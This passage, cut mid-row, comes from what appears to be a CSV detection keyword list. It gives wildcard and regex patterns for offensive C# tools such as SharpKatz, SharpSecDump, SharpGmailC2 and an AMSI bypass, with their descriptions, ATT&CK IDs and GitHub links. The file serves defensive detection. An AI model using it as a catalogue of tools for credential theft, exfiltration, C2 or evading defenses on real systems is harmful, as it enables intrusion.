TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*/SharpEventPersist.git*",".{0,1000}\/SharpEventPersist\.git.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*/SharpExec.exe*",".{0,1000}\/SharpExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpExfiltrate.git*",".{0,1000}\/SharpExfiltrate\.git.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*/SharpExfiltrate/*",".{0,1000}\/SharpExfiltrate\/.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*/SharpFinder.exe*",".{0,1000}\/SharpFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpGhostTask*",".{0,1000}\/SharpGhostTask.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*/SharpGmailC2.git*",".{0,1000}\/SharpGmailC2\.git.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*/SharpGPOAbuse.exe*",".{0,1000}\/SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpHandler.exe*",".{0,1000}\/SharpHandler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpHandler.py*",".{0,1000}\/SharpHandler\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/SharpHide.git*",".{0,1000}\/SharpHide\.git.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*/SharpHose.exe*",".{0,1000}\/SharpHose\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpHose.exe*",".{0,1000}\/SharpHose\.exe.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","1","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "*/SharpHound.exe*",".{0,1000}\/SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpKatz.exe*",".{0,1000}\/SharpKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpKiller.git*",".{0,1000}\/SharpKiller\.git.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*/Sharp-Killer.sln*",".{0,1000}\/Sharp\-Killer\.sln.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*/SharpLAPS.exe*",".{0,1000}\/SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpLDAP.git*",".{0,1000}\/SharpLDAP\.git.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","N/A","N/A","N/A","N/A" "*/SharpMapExec.exe*",".{0,1000}\/SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpMiniDump.exe*",".{0,1000}\/SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpMove.exe*",".{0,1000}\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpNamedPipePTH.exe*",".{0,1000}\/SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpNoPSExec*",".{0,1000}\/SharpNoPSExec.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*/SharpNoPSExec.exe*",".{0,1000}\/SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpPersistSD.dll*",".{0,1000}\/SharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/SharpPersistSD.git*",".{0,1000}\/SharpPersistSD\.git.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/SharpPrinter.exe*",".{0,1000}\/SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpRDP.exe*",".{0,1000}\/SharpRDP\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpRDP.git*",".{0,1000}\/SharpRDP\.git.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*/SharpRDPHijack*",".{0,1000}\/SharpRDPHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","5","407","71","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*/SharpRDPThief.git*",".{0,1000}\/SharpRDPThief\.git.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*/SharpReg.exe*",".{0,1000}\/SharpReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpRoast.exe*",".{0,1000}\/SharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/SharpSCCM.exe*",".{0,1000}\/SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSearch.exe*",".{0,1000}\/SharpSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSecDump.exe*",".{0,1000}\/SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSecDump.git*",".{0,1000}\/SharpSecDump\.git.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*/SharpShares.exe*",".{0,1000}\/SharpShares\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpShares.git*",".{0,1000}\/SharpShares\.git.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*/SharpShares/Enums*",".{0,1000}\/SharpShares\/Enums.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*/SharpShares-master*",".{0,1000}\/SharpShares\-master.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*/SharpShellPipe.git*",".{0,1000}\/SharpShellPipe\.git.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*/Sharp-SMBExec.exe*",".{0,1000}\/Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSniper.exe*",".{0,1000}\/SharpSniper\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSocks*",".{0,1000}\/SharpSocks.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*/SharpSphere.exe*",".{0,1000}\/SharpSphere\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpSploit*",".{0,1000}\/SharpSploit.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/SharpSploit.dll*",".{0,1000}\/SharpSploit\.dll.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" 